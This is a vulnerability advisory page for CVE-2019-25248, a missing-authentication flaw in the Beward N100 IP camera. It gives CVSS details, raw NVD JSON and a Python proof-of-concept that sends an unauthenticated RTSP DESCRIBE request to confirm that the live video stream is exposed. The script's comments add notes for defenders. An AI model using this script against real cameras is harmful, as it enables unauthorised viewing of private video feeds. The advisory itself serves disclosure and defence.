Security Vulnerability Report
CVE-2019-25248 CVSS 7.5 HIGH

CVE-2019-25248

Published: 2025-12-24 20:15:53
Last Modified: 2026-04-15 00:35:42

Description

Beward N100 M2.1.6.04C014 contains a missing-authentication vulnerability (CWE-306) that allows remote attackers to access live video streams without credentials. Because the video access mechanism does not require authentication, an attacker can retrieve the camera's RTSP stream directly.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Beward N100 M2.1.6.04C014

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
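#!/usr/bin/env python3
# CVE-2019-25248 PoC - Beward N100 Unauthenticated RTSP Stream Access
# Usage: python3 cve-2019-25248.py <target_ip> [rtsp_port]
#
# What the check proves: the camera answers an RTSP DESCRIBE that carries no
# Authorization header with a 200 status, i.e. the stream description is
# served without credentials (CWE-306, missing authentication).
#
# For defenders: the same signal is visible on the wire as a DESCRIBE for
# /live/ch00_0 with no Authorization header that is answered with 200 instead
# of 401. This page lists no fixed firmware version, so the practical control
# is to keep the RTSP port (554 by default) reachable only from the
# recorder / management network.
import sys
import socket


def exploit_beward_rtsp(target_ip, rtsp_port=554):
    """Check whether the camera serves its RTSP description without credentials.

    Sends a single RTSP DESCRIBE for ``/live/ch00_0`` with no Authorization
    header and inspects the status line of the reply.

    Args:
        target_ip: Address of the camera to check.
        rtsp_port: TCP port of the RTSP service (default 554).

    Returns:
        True if the reply's status line carries status code 200, False on any
        other status, on an empty reply, on timeout, or on a socket error.
    """
    print(f"[*] Target: {target_ip}:{rtsp_port}")
    print("[*] Exploiting CVE-2019-25248...")

    stream_url = f"rtsp://{target_ip}:{rtsp_port}/live/ch00_0"

    # DESCRIBE deliberately carries no Authorization header: a server that
    # enforces authentication answers 401, not 200.
    rtsp_describe = (
        f"DESCRIBE {stream_url} RTSP/1.0\r\n"
        "CSeq: 1\r\n"
        "User-Agent: Python-RTSP-Client\r\n"
        "Accept: application/sdp\r\n"
        "\r\n"
    )

    try:
        # The context manager closes the socket on every path. The original
        # closed it in a `finally` that referenced `sock` even when
        # socket.socket() itself had failed, which raised a NameError there.
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.settimeout(10)
            sock.connect((target_ip, rtsp_port))
            print("[*] Sending RTSP DESCRIBE request without authentication...")
            # sendall() retries partial writes; send() may transmit only a prefix.
            sock.sendall(rtsp_describe.encode())
            # One read is enough for the verdict: only the status line, which
            # comes first in the reply, is evaluated below.
            response = sock.recv(4096)
    except socket.timeout:
        print("[-] ERROR: Connection timeout")
        return False
    except socket.error as e:
        print(f"[-] ERROR: {e}")
        return False

    text = response.decode('utf-8', errors='ignore')
    print(f"[*] Received response ({len(response)} bytes)")
    print(text)

    # Judge by the status code in the status line ("RTSP/1.0 200 OK"), not by
    # the substring "200 OK" anywhere in the reply: a 401 whose headers or body
    # happen to contain that text would otherwise be reported as vulnerable.
    status_fields = text.split("\r\n", 1)[0].split(None, 2)
    unauthenticated_ok = (
        len(status_fields) >= 2
        and status_fields[0].startswith("RTSP/")
        and status_fields[1] == "200"
    )

    if unauthenticated_ok:
        print("[+] SUCCESS: Unauthenticated access to RTSP stream confirmed!")
        print(f"[+] Video stream URL: {stream_url}")
        return True

    print("[-] FAILED: Could not access stream")
    return False


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip> [rtsp_port]")
        sys.exit(1)

    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 554
    exploit_beward_rtsp(target, port)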

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2019-25248", "sourceIdentifier": "[email protected]", "published": "2025-12-24T20:15:53.093", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Beward N100 M2.1.6.04C014 contains an unauthenticated vulnerability that allows remote attackers to access live video streams without credentials. Attackers can directly retrieve the camera's RTSP stream by exploiting the lack of authentication in the video access mechanism."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", 
"vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://www.beward.net", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/46317", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5509.php", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5509.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}